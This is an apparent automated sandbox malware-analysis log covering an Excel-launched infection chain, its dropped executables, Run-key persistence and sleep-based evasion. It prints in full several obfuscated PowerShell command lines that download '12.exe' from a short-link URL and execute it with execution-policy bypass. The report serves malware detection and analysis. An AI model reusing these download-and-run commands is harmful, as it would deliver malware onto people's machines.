Source: C:\Users\user\AppData\Local\Temp\12.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: RegAsm.pdb source: RegAsm.exe
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000006.00000002.2099102007.0000000002720000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2140184576.000000001B940000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2158358112.000000001B8A0000.00000002.00000001.sdmp

Data Obfuscation:

Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
Yara detected aPLib compressed binary
Source: Yara match File source: Process Memory Space: 12.exe PID: 2800, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2192, type: MEMORY
Source: Yara match File source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 11_2_012A5456 push ss; retf 11_2_012A5459
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 11_2_0031AB04 pushad ; ret 11_2_0031AB2D
Source: C:\Users\user\ntrwe.exe Code function: 15_2_00E95456 push ss; retf 15_2_00E95459
Source: C:\Users\user\ntrwe.exe Code function: 15_2_005013F1 push edx; retf 15_2_00501403
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_0025523F push cs; iretd 17_2_00255240
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_00402AC0 push eax; ret 17_2_00402AD4
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_00402AC0 push eax; ret 17_2_00402AFC
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 19_2_0123523F push cs; iretd 19_2_01235240

Persistence and Installation Behavior:

Drops PE files to the document folder of the user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\12.exe
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\12.exe
Source: C:\Users\user\ntrwe.exe File created: C:\Users\user\AppData\Local\Temp\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\12.exe File created: C:\Users\user\ntrwe.exe
Drops PE files to the user directory
Source: C:\Users\user\AppData\Local\Temp\12.exe File created: C:\Users\user\ntrwe.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Users\user\AppData\Local\Temp\12.exe File created: C:\Users\user\ntrwe.exe
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run jfdts (2 identical events)

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\AppData\Local\Temp\12.exe File opened: C:\Users\user\AppData\Local\Temp\12.exe\:Zone.Identifier read attributes | delete
Source: C:\Users\user\ntrwe.exe File opened: C:\Users\user\ntrwe.exe\:Zone.Identifier read attributes | delete (2 identical events)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (26 identical events)
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX (7 identical events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (152 identical events)
Source: C:\Users\user\AppData\Local\Temp\12.exe Process information set: NOOPENFILEERRORBOX (44 identical events)
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX (3 identical events)
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX (25 identical events)
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\12.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\ntrwe.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2708 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 1484 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 1840 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 1840 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 1836 Thread sleep count: 187 > 30
Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 2964 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\ntrwe.exe TID: 1476 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\ntrwe.exe TID: 1476 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\ntrwe.exe TID: 1900 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\ntrwe.exe TID: 1544 Thread sleep count: 156 > 30
Source: C:\Users\user\ntrwe.exe TID: 1192 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 2076 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\ntrwe.exe TID: 2492 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\ntrwe.exe TID: 2492 Thread sleep time: -30000s >= -30000s
